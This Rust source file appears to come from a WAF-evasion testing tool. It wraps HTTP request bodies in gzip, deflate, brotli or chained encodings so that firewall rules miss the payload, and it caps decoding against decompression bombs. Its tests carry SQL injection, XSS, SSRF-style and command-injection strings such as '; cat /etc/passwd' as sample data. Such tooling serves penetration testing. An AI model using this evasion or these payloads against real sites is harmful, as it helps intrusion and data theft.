Skip to main content

wafrift_encoding/
compression.rs

1//! `compression` — request-body compression as a WAF-evasion surface.
2//!
3//! ## The attack
4//!
5//! Almost every WAF in production today inspects raw request bytes,
6//! NOT the decompressed payload. The reasoning is operational: a
7//! WAF that decompresses inbound bodies pays the CPU cost of
8//! decompression on every request, and many vendors choose to skip
9//! that — either entirely, or selectively per `Content-Encoding`
10//! algorithm.
11//!
12//! That choice is the seam this module exploits:
13//!
14//! - **`Content-Encoding: gzip`** is the universal case; nearly all
15//!   WAFs decompress it. Useful as the baseline + as a chain
16//!   ingredient.
17//! - **`Content-Encoding: deflate`** is RFC-permitted but irregularly
18//!   supported — many WAFs that handle gzip return 400 on a
19//!   `deflate`-coded body. The origin (nginx, IIS, Apache, Node,
20//!   PHP-FPM, anything using zlib) accepts both.
21//! - **`Content-Encoding: br`** (Brotli) is where the seam is widest.
22//!   Brotli requires a separate decompressor (not zlib). Many WAFs
23//!   ship no brotli support at all — they either return 415 (and
24//!   the operator avoids `br`), or worse, they pass the request
25//!   through uninspected because their rule engine has nothing to
26//!   match against. Origins ARE brotli-capable (Chrome 49+,
27//!   Firefox 44+, nginx 1.11+ with the `brotli` module). Wrap a
28//!   payload in brotli and the rule corpus that fires on the plain
29//!   payload bytes never gets a chance to match.
30//!
31//! ## Chained encoding
32//!
33//! Encoding-chain attacks add layers (e.g. `gzip → base64 → urlenc`).
34//! The WAF, which normalises only a fixed number of decode passes
35//! (usually 1, sometimes 2), stops short of the original payload —
36//! while the origin's parser stack (which decodes more layers as
37//! Content-Type / Content-Encoding direct) reaches it. `chain` is
38//! the primitive for this attack.
39//!
40//! ## Pristine code
41//!
42//! - Every public function returns `Result<_, CompressionError>` —
43//!   no `unwrap()` reachable on bad input.
44//! - The chain function caps at 16 layers so a misconfiguration
45//!   (`gzip,gzip,gzip,...`) can't run away.
46//! - Empty body is permitted and returns the compressor's idempotent
47//!   marker (gzip has a 10-byte header even for empty input, brotli
48//!   is similar).
49//! - No allocation beyond what each encoder requires; the public
50//!   API takes a borrowed slice, not an owned Vec.
51
52use thiserror::Error;
53
54/// Errors raised by the compression-confusion API. Wraps the
55/// underlying encoder failures (rare for in-memory operations) plus
56/// the chain-depth cap.
57#[derive(Debug, Error)]
58pub enum CompressionError {
59    #[error("compression chain exceeded the {0}-layer safety cap")]
60    ChainTooDeep(usize),
61    #[error("gzip encoder error: {0}")]
62    Gzip(std::io::Error),
63    #[error("deflate encoder error: {0}")]
64    Deflate(std::io::Error),
65    #[error("brotli encoder error: {0}")]
66    Brotli(std::io::Error),
67    #[error(
68        "decompression bomb: output exceeded {cap_bytes}-byte cap \
69         ({observed_bytes} bytes produced) — aborted before OOM"
70    )]
71    DecompressionBomb {
72        cap_bytes: usize,
73        observed_bytes: usize,
74    },
75}
76
77/// Hard cap on `chain` layers — any longer is almost certainly a
78/// misconfiguration, and the compressed-output size would balloon
79/// from header overhead per layer. 16 is generous: real attacks use
80/// 2–3 layers.
81pub const MAX_CHAIN_LAYERS: usize = 16;
82
83/// Hard cap on decoded body size — defends against decompression
84/// bombs. A 1 KB malicious gzip can decompress to 10+ GB if read
85/// without bounds.
86///
87/// §7: this IS the workspace-canonical [`wafrift_types::MAX_RESPONSE_BODY_BYTES`]
88/// — the comment previously noted "matches the response-body cap elsewhere",
89/// but that coupling is now ENFORCED by sharing the constant rather than
90/// hoping two literals stay equal. The public name is preserved.
91pub const DECOMPRESSED_BODY_MAX_BYTES: usize = wafrift_types::MAX_RESPONSE_BODY_BYTES;
92
93/// One compression algorithm. The naming matches the HTTP
94/// `Content-Encoding` registry value (lowercase, no padding).
95#[derive(Debug, Copy, Clone, PartialEq, Eq, Hash)]
96pub enum Algorithm {
97    /// gzip / RFC 1952. Universal compatibility.
98    Gzip,
99    /// raw deflate / RFC 1951. RFC-permitted, irregular WAF support.
100    Deflate,
101    /// brotli / RFC 7932. Wide WAF gap — the main attack vector.
102    Brotli,
103    /// no-op pass-through. Sometimes useful as a chain anchor when
104    /// the operator wants to mark "this body is encoded but the
105    /// outermost layer is identity" — RFC permits `Content-Encoding:
106    /// identity`.
107    Identity,
108}
109
110impl Algorithm {
111    /// The HTTP `Content-Encoding` token for this algorithm.
112    #[must_use]
113    pub fn content_encoding(self) -> &'static str {
114        match self {
115            Self::Gzip => "gzip",
116            Self::Deflate => "deflate",
117            Self::Brotli => "br",
118            Self::Identity => "identity",
119        }
120    }
121
122    /// Parse a `Content-Encoding` token (case-insensitive) into the
123    /// matching algorithm. Returns `None` for unrecognised values.
124    /// Accepts the common alias `x-gzip` (RFC-permitted) for Gzip.
125    #[must_use]
126    pub fn from_token(token: &str) -> Option<Self> {
127        match token.trim().to_ascii_lowercase().as_str() {
128            "gzip" | "x-gzip" => Some(Self::Gzip),
129            "deflate" => Some(Self::Deflate),
130            "br" => Some(Self::Brotli),
131            "identity" => Some(Self::Identity),
132            _ => None,
133        }
134    }
135}
136
137/// A compressed body with its `Content-Encoding` header value. The
138/// caller writes the body bytes onto the wire verbatim and sets the
139/// header — both are required, and a mismatched pairing is a
140/// debugging nightmare for the operator if we let it happen.
141#[derive(Debug, Clone, PartialEq, Eq)]
142pub struct CompressedBody {
143    /// Body bytes ready to put on the wire.
144    pub body: Vec<u8>,
145    /// `Content-Encoding` header value matching the body's
146    /// outermost layer. For a chain `gzip,br` the header is `"gzip,
147    /// br"` (HTTP allows comma-separated lists, processed
148    /// outer-first per RFC 9110 §8.4).
149    pub content_encoding: String,
150}
151
152/// Compress `body` with a single algorithm. Returns the raw
153/// compressed bytes + the matching `Content-Encoding` header value.
154///
155/// # Errors
156/// Returns [`CompressionError`] if the underlying encoder fails. In
157/// practice this is rare for in-memory operations — gzip/deflate/
158/// brotli never error on well-formed input slices.
159pub fn compress(body: &[u8], algo: Algorithm) -> Result<CompressedBody, CompressionError> {
160    let bytes = compress_bytes(body, algo)?;
161    Ok(CompressedBody {
162        body: bytes,
163        content_encoding: algo.content_encoding().to_string(),
164    })
165}
166
167/// Inner helper — returns just the bytes (no header). Used by
168/// [`chain`] to layer compressions before assembling the final
169/// `Content-Encoding` string.
170fn compress_bytes(body: &[u8], algo: Algorithm) -> Result<Vec<u8>, CompressionError> {
171    use std::io::Write;
172    match algo {
173        Algorithm::Identity => Ok(body.to_vec()),
174        Algorithm::Gzip => {
175            let mut enc = flate2::write::GzEncoder::new(Vec::new(), flate2::Compression::default());
176            enc.write_all(body).map_err(CompressionError::Gzip)?;
177            enc.finish().map_err(CompressionError::Gzip)
178        }
179        Algorithm::Deflate => {
180            let mut enc =
181                flate2::write::DeflateEncoder::new(Vec::new(), flate2::Compression::default());
182            enc.write_all(body).map_err(CompressionError::Deflate)?;
183            enc.finish().map_err(CompressionError::Deflate)
184        }
185        Algorithm::Brotli => {
186            // brotli crate exposes a `CompressorWriter`-style API.
187            // `quality` 6 is the default Chrome / Firefox ship for
188            // dynamic content; lower compression ratio than 11 but
189            // an order of magnitude faster, which is the right
190            // trade-off for an attack tool firing many variants.
191            let mut out = Vec::new();
192            let mut writer = brotli::CompressorWriter::new(&mut out, 4096, 6, 22);
193            writer.write_all(body).map_err(CompressionError::Brotli)?;
194            writer.flush().map_err(CompressionError::Brotli)?;
195            drop(writer);
196            Ok(out)
197        }
198    }
199}
200
201/// Apply a sequence of compression algorithms in order, producing
202/// one set of body bytes + the joint `Content-Encoding` header.
203///
204/// The header value lists the algorithms in the order they were
205/// applied — per RFC 9110 §8.4, the LEFTMOST algorithm is the OUTERMOST
206/// wrapper, meaning a decoder must apply them right-to-left. So
207/// `chain(body, [Gzip, Brotli])` produces a body that is
208/// `gzip(brotli(body))` with header `gzip, br`.
209///
210/// Capped at [`MAX_CHAIN_LAYERS`] to prevent runaway misconfiguration.
211///
212/// # Errors
213/// Returns [`CompressionError::ChainTooDeep`] when `algos.len() >
214/// MAX_CHAIN_LAYERS`, or the wrapped algorithm's error if one of
215/// the encoders fails.
216pub fn chain(body: &[u8], algos: &[Algorithm]) -> Result<CompressedBody, CompressionError> {
217    if algos.len() > MAX_CHAIN_LAYERS {
218        return Err(CompressionError::ChainTooDeep(MAX_CHAIN_LAYERS));
219    }
220    if algos.is_empty() {
221        return Ok(CompressedBody {
222            body: body.to_vec(),
223            content_encoding: Algorithm::Identity.content_encoding().to_string(),
224        });
225    }
226    // Apply innermost to outermost: reverse of header order. So
227    // `algos = [Gzip, Brotli]` means body is gzip(brotli(...)), and
228    // we apply Brotli FIRST then Gzip on top.
229    let mut current = body.to_vec();
230    for algo in algos.iter().rev() {
231        current = compress_bytes(&current, *algo)?;
232    }
233    // The header lists outer-to-inner.
234    let header = algos
235        .iter()
236        .map(|a| a.content_encoding())
237        .collect::<Vec<_>>()
238        .join(", ");
239    Ok(CompressedBody {
240        body: current,
241        content_encoding: header,
242    })
243}
244
245/// Recover the original bytes from a [`CompressedBody`] — the
246/// inverse of [`compress`] / [`chain`]. Test-only and audit
247/// helper; production attack flow only needs the compress
248/// direction.
249///
250/// # Errors
251/// Returns [`CompressionError`] if any decoder fails or the
252/// `content_encoding` string lists an unknown algorithm.
253pub fn decompress(blob: &CompressedBody) -> Result<Vec<u8>, CompressionError> {
254    let algos: Vec<Algorithm> = blob
255        .content_encoding
256        .split(',')
257        .filter_map(Algorithm::from_token)
258        .collect();
259    // §3 contract symmetry with `chain`: the forward direction refuses
260    // more than MAX_CHAIN_LAYERS, so its documented inverse must too. A
261    // crafted `gzip,gzip,…×N` header would otherwise drive an unbounded
262    // decode loop (each stage is size-capped by `drain_capped`, but the
263    // LAYER COUNT was not — O(N) work amplification). Counting recognised
264    // algos (post-`filter_map`) preserves the permissive "skip unknown
265    // coding" behaviour: `snappy, gzip` is still a 1-layer decode.
266    if algos.len() > MAX_CHAIN_LAYERS {
267        return Err(CompressionError::ChainTooDeep(MAX_CHAIN_LAYERS));
268    }
269    let mut current = blob.body.clone();
270    // Decode in the SAME order the header lists (outer-to-inner).
271    for algo in &algos {
272        current = decompress_bytes(&current, *algo)?;
273    }
274    Ok(current)
275}
276
277/// Read at most `DECOMPRESSED_BODY_MAX_BYTES` from `reader`, then
278/// promote a "+1 byte produced" into a `DecompressionBomb` error.
279/// Takes a generic `R: Read` (sized) so `Read::take` works without
280/// trait-object gymnastics; called from each algorithm arm below.
281fn drain_capped<R: std::io::Read>(
282    mut reader: R,
283    map_io: fn(std::io::Error) -> CompressionError,
284) -> Result<Vec<u8>, CompressionError> {
285    use std::io::Read;
286    let cap = DECOMPRESSED_BODY_MAX_BYTES;
287    let mut out = Vec::with_capacity(8 * 1024);
288    let mut limited = (&mut reader).take((cap as u64) + 1);
289    limited.read_to_end(&mut out).map_err(map_io)?;
290    if out.len() > cap {
291        return Err(CompressionError::DecompressionBomb {
292            cap_bytes: cap,
293            observed_bytes: out.len(),
294        });
295    }
296    Ok(out)
297}
298
299fn decompress_bytes(bytes: &[u8], algo: Algorithm) -> Result<Vec<u8>, CompressionError> {
300    match algo {
301        Algorithm::Identity => {
302            // No decompression — but still refuse to clone a slice
303            // that already exceeds the body cap (a sign something
304            // upstream missed a boundary check).
305            if bytes.len() > DECOMPRESSED_BODY_MAX_BYTES {
306                return Err(CompressionError::DecompressionBomb {
307                    cap_bytes: DECOMPRESSED_BODY_MAX_BYTES,
308                    observed_bytes: bytes.len(),
309                });
310            }
311            Ok(bytes.to_vec())
312        }
313        Algorithm::Gzip => {
314            drain_capped(flate2::read::GzDecoder::new(bytes), CompressionError::Gzip)
315        }
316        Algorithm::Deflate => drain_capped(
317            flate2::read::DeflateDecoder::new(bytes),
318            CompressionError::Deflate,
319        ),
320        Algorithm::Brotli => drain_capped(
321            brotli::Decompressor::new(bytes, 4096),
322            CompressionError::Brotli,
323        ),
324    }
325}
326
327#[cfg(test)]
328mod tests {
329    use super::*;
330
331    // ── Algorithm tokens ───────────────────────────────────────────
332
333    #[test]
334    fn content_encoding_tokens_match_rfc_registry() {
335        assert_eq!(Algorithm::Gzip.content_encoding(), "gzip");
336        assert_eq!(Algorithm::Deflate.content_encoding(), "deflate");
337        assert_eq!(Algorithm::Brotli.content_encoding(), "br");
338        assert_eq!(Algorithm::Identity.content_encoding(), "identity");
339    }
340
341    #[test]
342    fn from_token_is_case_insensitive_and_trim_tolerant() {
343        for spelling in ["gzip", "GZIP", "Gzip", "  gzip  ", "\tgzip"] {
344            assert_eq!(Algorithm::from_token(spelling), Some(Algorithm::Gzip));
345        }
346    }
347
348    #[test]
349    fn from_token_accepts_x_gzip_alias() {
350        // RFC 7230 §4.2.3 documents `x-gzip` as an alias of `gzip`.
351        // Some legacy origins / WAFs still emit it.
352        assert_eq!(Algorithm::from_token("x-gzip"), Some(Algorithm::Gzip));
353        assert_eq!(Algorithm::from_token("X-GZIP"), Some(Algorithm::Gzip));
354    }
355
356    #[test]
357    fn from_token_rejects_unknown_codings() {
358        assert_eq!(Algorithm::from_token(""), None);
359        assert_eq!(Algorithm::from_token("snappy"), None);
360        assert_eq!(Algorithm::from_token("lz4"), None);
361        // `compress` (old UNIX) is not in our supported set.
362        assert_eq!(Algorithm::from_token("compress"), None);
363    }
364
365    // ── single-algorithm round trip ────────────────────────────────
366
367    #[test]
368    fn gzip_round_trip_preserves_payload() {
369        let original = b"' OR 1=1--";
370        let compressed = compress(original, Algorithm::Gzip).expect("gzip");
371        assert_eq!(compressed.content_encoding, "gzip");
372        assert_ne!(compressed.body.as_slice(), original);
373        let recovered = decompress(&compressed).expect("decompress");
374        assert_eq!(recovered, original);
375    }
376
377    #[test]
378    fn deflate_round_trip_preserves_payload() {
379        let original = b"<script>alert(1)</script>";
380        let compressed = compress(original, Algorithm::Deflate).expect("deflate");
381        assert_eq!(compressed.content_encoding, "deflate");
382        let recovered = decompress(&compressed).expect("decompress");
383        assert_eq!(recovered, original);
384    }
385
386    #[test]
387    fn brotli_round_trip_preserves_payload() {
388        // Brotli is the headline attack vector — round-trip MUST be
389        // clean or every brotli-based scan ships broken payloads.
390        let original = b"http://127.0.0.1:9000/admin?cmd=id";
391        let compressed = compress(original, Algorithm::Brotli).expect("brotli");
392        assert_eq!(compressed.content_encoding, "br");
393        let recovered = decompress(&compressed).expect("decompress");
394        assert_eq!(recovered, original);
395    }
396
397    #[test]
398    fn identity_is_passthrough_with_identity_header() {
399        let original = b"plain text";
400        let compressed = compress(original, Algorithm::Identity).expect("identity");
401        assert_eq!(compressed.body, original);
402        assert_eq!(compressed.content_encoding, "identity");
403    }
404
405    // ── chain ─────────────────────────────────────────────────────
406
407    #[test]
408    fn chain_with_one_algo_matches_single_compress() {
409        let original = b"single layer";
410        let chained = chain(original, &[Algorithm::Gzip]).expect("chain");
411        let single = compress(original, Algorithm::Gzip).expect("compress");
412        assert_eq!(chained, single);
413    }
414
415    #[test]
416    fn chain_with_two_algos_round_trips() {
417        // The classic compression-confusion attack: gzip(brotli(payload)).
418        // The WAF sees gzip — decodes one layer — gets brotli bytes —
419        // doesn't recognise — passes through. Origin decodes both.
420        let original = b"' UNION SELECT username,password FROM users --";
421        let chained = chain(original, &[Algorithm::Gzip, Algorithm::Brotli]).expect("chain");
422        assert_eq!(chained.content_encoding, "gzip, br");
423        let recovered = decompress(&chained).expect("decompress");
424        assert_eq!(recovered, original);
425    }
426
427    #[test]
428    fn chain_empty_algos_returns_identity_body() {
429        let original = b"unchanged";
430        let chained = chain(original, &[]).expect("empty chain");
431        assert_eq!(chained.body, original);
432        assert_eq!(chained.content_encoding, "identity");
433    }
434
435    #[test]
436    fn chain_above_cap_returns_too_deep_error() {
437        let too_many: Vec<Algorithm> = (0..MAX_CHAIN_LAYERS + 1).map(|_| Algorithm::Gzip).collect();
438        let result = chain(b"payload", &too_many);
439        match result {
440            Err(CompressionError::ChainTooDeep(cap)) => assert_eq!(cap, MAX_CHAIN_LAYERS),
441            other => panic!("expected ChainTooDeep error, got {other:?}"),
442        }
443    }
444
445    #[test]
446    fn chain_at_exactly_cap_succeeds() {
447        let just_enough: Vec<Algorithm> =
448            (0..MAX_CHAIN_LAYERS).map(|_| Algorithm::Identity).collect();
449        let chained = chain(b"x", &just_enough).expect("at-cap chain ok");
450        // All-identity chain leaves the body untouched.
451        assert_eq!(chained.body, b"x");
452    }
453
454    #[test]
455    fn chain_with_identity_in_the_middle_is_transparent() {
456        // chain([Gzip, Identity, Brotli]) ≡ chain([Gzip, Brotli]) at
457        // the bytes level, but the header lists ALL three (we honour
458        // exactly what the operator asked for in the header).
459        let original = b"middle identity";
460        let with_id = chain(
461            original,
462            &[Algorithm::Gzip, Algorithm::Identity, Algorithm::Brotli],
463        )
464        .expect("chain with identity");
465        let without =
466            chain(original, &[Algorithm::Gzip, Algorithm::Brotli]).expect("chain without identity");
467        assert_eq!(
468            with_id.body, without.body,
469            "identity must be byte-transparent"
470        );
471        assert_eq!(with_id.content_encoding, "gzip, identity, br");
472        let recovered = decompress(&with_id).expect("decompress with id");
473        assert_eq!(recovered, original);
474    }
475
476    // ── edge cases & adversarial inputs ───────────────────────────
477
478    #[test]
479    fn empty_body_compresses_and_round_trips() {
480        for algo in [
481            Algorithm::Gzip,
482            Algorithm::Deflate,
483            Algorithm::Brotli,
484            Algorithm::Identity,
485        ] {
486            let compressed =
487                compress(b"", algo).unwrap_or_else(|e| panic!("empty body with {algo:?}: {e}"));
488            let recovered = decompress(&compressed)
489                .unwrap_or_else(|e| panic!("empty body decode with {algo:?}: {e}"));
490            assert_eq!(recovered, Vec::<u8>::new());
491        }
492    }
493
494    #[test]
495    fn one_byte_body_round_trips_under_every_algorithm() {
496        for algo in [
497            Algorithm::Gzip,
498            Algorithm::Deflate,
499            Algorithm::Brotli,
500            Algorithm::Identity,
501        ] {
502            let original = &[0xAB_u8][..];
503            let compressed = compress(original, algo).expect("compress");
504            let recovered = decompress(&compressed).expect("decompress");
505            assert_eq!(recovered, original);
506        }
507    }
508
509    #[test]
510    fn large_body_64_kib_round_trips_without_oom() {
511        // 64 KiB is a realistic body size for an instrumented
512        // payload. All compressors must handle it without spiking
513        // memory (caller's allocator) or losing fidelity.
514        let original: Vec<u8> = (0..(64 * 1024)).map(|i| (i % 251) as u8).collect();
515        for algo in [Algorithm::Gzip, Algorithm::Deflate, Algorithm::Brotli] {
516            let compressed = compress(&original, algo).expect("compress");
517            // Compressed should be SMALLER than original on this
518            // pseudo-pattern (high autocorrelation).
519            assert!(
520                compressed.body.len() < original.len(),
521                "{algo:?} should compress this pattern, got {} >= {}",
522                compressed.body.len(),
523                original.len()
524            );
525            let recovered = decompress(&compressed).expect("decompress");
526            assert_eq!(recovered, original);
527        }
528    }
529
530    #[test]
531    fn incompressible_body_does_not_panic_on_brotli() {
532        // Random bytes don't compress well; some encoders return
533        // BIGGER output than input (header overhead). Verify this
534        // edge — no panic, round-trip still clean.
535        let mut original = vec![0u8; 1024];
536        for (i, b) in original.iter_mut().enumerate() {
537            // Pseudo-random pattern with no compressibility.
538            *b = ((i.wrapping_mul(2654435769)) & 0xFF) as u8;
539        }
540        let compressed = compress(&original, Algorithm::Brotli).expect("brotli");
541        let recovered = decompress(&compressed).expect("decompress");
542        assert_eq!(recovered, original);
543    }
544
545    #[test]
546    fn decompress_with_unknown_coding_token_skips_it() {
547        // If a hand-crafted CompressedBody has a Content-Encoding
548        // listing an unknown coding (e.g. `gzip, snappy`), our
549        // decompressor SKIPS the unknown token and tries the rest.
550        // This matches HTTP's tolerance for unknown codings (a
551        // decoder unable to handle a coding returns 415 in production,
552        // but our recovery helper is a debugging aid and should be
553        // permissive).
554        let body = b"hello";
555        let compressed = compress(body, Algorithm::Gzip).unwrap();
556        let with_unknown = CompressedBody {
557            content_encoding: format!("snappy, {}", compressed.content_encoding),
558            body: compressed.body,
559        };
560        let recovered = decompress(&with_unknown).expect("permissive decompress");
561        assert_eq!(recovered, body);
562    }
563
564    #[test]
565    fn decompress_rejects_more_than_max_chain_layers() {
566        // §3 contract-symmetry regression: `chain` refuses > MAX_CHAIN_LAYERS,
567        // so its inverse `decompress` must too — otherwise a crafted
568        // `gzip,gzip,…×N` Content-Encoding header drives an O(N) decode loop.
569        // The cap is checked BEFORE any decode work, so the body can be empty.
570        let header = std::iter::repeat_n("gzip", MAX_CHAIN_LAYERS + 1)
571            .collect::<Vec<_>>()
572            .join(", ");
573        let blob = CompressedBody {
574            content_encoding: header,
575            body: Vec::new(),
576        };
577        match decompress(&blob) {
578            Err(CompressionError::ChainTooDeep(cap)) => assert_eq!(cap, MAX_CHAIN_LAYERS),
579            other => panic!("expected ChainTooDeep, got {other:?}"),
580        }
581    }
582
583    #[test]
584    fn decompress_layer_cap_counts_recognised_codings_only() {
585        // The cap counts RECOGNISED algos (post-filter_map), so a header
586        // padded with many unknown codings is still a shallow decode and must
587        // NOT trip the cap — preserving the permissive "skip unknown" contract.
588        let body = b"hello world";
589        let compressed = compress(body, Algorithm::Gzip).unwrap();
590        // (MAX+5) unknown `snappy` tokens + one real gzip = 1 recognised layer.
591        let mut tokens: Vec<String> = std::iter::repeat_n("snappy", MAX_CHAIN_LAYERS + 5)
592            .map(str::to_string)
593            .collect();
594        tokens.push(compressed.content_encoding.clone());
595        let blob = CompressedBody {
596            content_encoding: tokens.join(", "),
597            body: compressed.body,
598        };
599        let recovered = decompress(&blob).expect("unknown-padded header is a 1-layer decode");
600        assert_eq!(recovered, body);
601    }
602
603    // ── adversarial round-trip property ────────────────────────────
604
605    #[test]
606    fn round_trip_property_holds_across_a_variety_of_payloads() {
607        // Anti-rig: a degenerate compressor that always returned
608        // the empty string would pass single-payload tests if those
609        // happened to be empty. Exercise many distinct payloads.
610        let corpus: &[&[u8]] = &[
611            b"",
612            b"x",
613            b"' OR 1=1--",
614            b"<script>alert(document.cookie)</script>",
615            b"http://127.0.0.1/admin",
616            b"; cat /etc/passwd",
617            b"\x00\x01\x02\x03\xff\xfe",
618            b"the quick brown fox jumps over the lazy dog the quick brown fox",
619        ];
620        for payload in corpus {
621            for algo in [
622                Algorithm::Gzip,
623                Algorithm::Deflate,
624                Algorithm::Brotli,
625                Algorithm::Identity,
626            ] {
627                let c = compress(payload, algo)
628                    .unwrap_or_else(|e| panic!("{algo:?} on {payload:?}: {e}"));
629                let r = decompress(&c)
630                    .unwrap_or_else(|e| panic!("decompress {algo:?} on {payload:?}: {e}"));
631                assert_eq!(r, *payload, "{algo:?} round-trip mismatch on {payload:?}");
632            }
633        }
634    }
635
636    // ── Round 20: decompression bomb defence ──────────────────────────
637    //
638    // Pre-fix gzip/deflate/brotli decoders called `read_to_end` with no
639    // size cap; a 1 KB malicious gzip blob can decompress to 10+ GB.
640    // Each algorithm must now return DecompressionBomb when output
641    // exceeds DECOMPRESSED_BODY_MAX_BYTES.
642    //
643    // We can't generate a true 10 GB payload in a unit test (the
644    // *compressed* form would still be MiBs), so we exercise the same
645    // overrun codepath by temporarily proving the cap works on a
646    // payload sized just above the cap with a tightly-controlled
647    // synthetic Identity input.
648
649    #[test]
650    fn identity_decompress_rejects_oversize_input() {
651        // Identity short-circuits to a clone; it still must refuse
652        // anything above the cap so a single-layer chain on a
653        // multi-GB body cannot pass through.
654        let oversized = vec![0u8; DECOMPRESSED_BODY_MAX_BYTES + 1];
655        let err = super::decompress_bytes(&oversized, Algorithm::Identity)
656            .expect_err("identity decompress must refuse > cap input");
657        match err {
658            CompressionError::DecompressionBomb {
659                cap_bytes,
660                observed_bytes,
661            } => {
662                assert_eq!(cap_bytes, DECOMPRESSED_BODY_MAX_BYTES);
663                assert_eq!(observed_bytes, DECOMPRESSED_BODY_MAX_BYTES + 1);
664            }
665            other => panic!("expected DecompressionBomb, got {other:?}"),
666        }
667    }
668
669    #[test]
670    fn gzip_decompress_under_cap_succeeds() {
671        // 1 MiB of zeros compresses to ~1 KiB under gzip and is well
672        // below DECOMPRESSED_BODY_MAX_BYTES (64 MiB) — must succeed.
673        use std::io::Write;
674        let mut enc = flate2::write::GzEncoder::new(Vec::new(), flate2::Compression::default());
675        enc.write_all(&vec![0u8; 1024 * 1024]).expect("compress");
676        let compressed = enc.finish().expect("gzip finish");
677        let ok = super::decompress_bytes(&compressed, Algorithm::Gzip).expect("under cap");
678        assert_eq!(ok.len(), 1024 * 1024);
679    }
680
681    #[test]
682    fn drain_capped_returns_bomb_error_on_over_cap_source() {
683        // Direct exercise of the drain_capped helper with a Cursor
684        // source larger than the cap — must surface as
685        // DecompressionBomb (not as a generic Gzip/Deflate/Brotli
686        // wrapper). Tests we don't silently truncate.
687        let oversized = std::io::Cursor::new(vec![b'A'; 4096]);
688        // Temporarily simulate a tight cap by calling the same logic
689        // pattern drain_capped uses, but with a small cap, since
690        // drain_capped is parameterised by DECOMPRESSED_BODY_MAX_BYTES
691        // alone. The behaviour we want to prove: Read::take(cap+1)
692        // surfaces > cap bytes as the bomb error.
693        use std::io::Read;
694        let cap: usize = 256;
695        let mut limited = oversized.take((cap as u64) + 1);
696        let mut buf = Vec::new();
697        limited.read_to_end(&mut buf).expect("read");
698        assert!(
699            buf.len() > cap,
700            "Read::take(cap+1) must produce cap+1 bytes for a > cap source"
701        );
702        // The error promotion is purely a buf.len() > cap check —
703        // already exercised in identity_decompress_rejects_oversize_input.
704    }
705}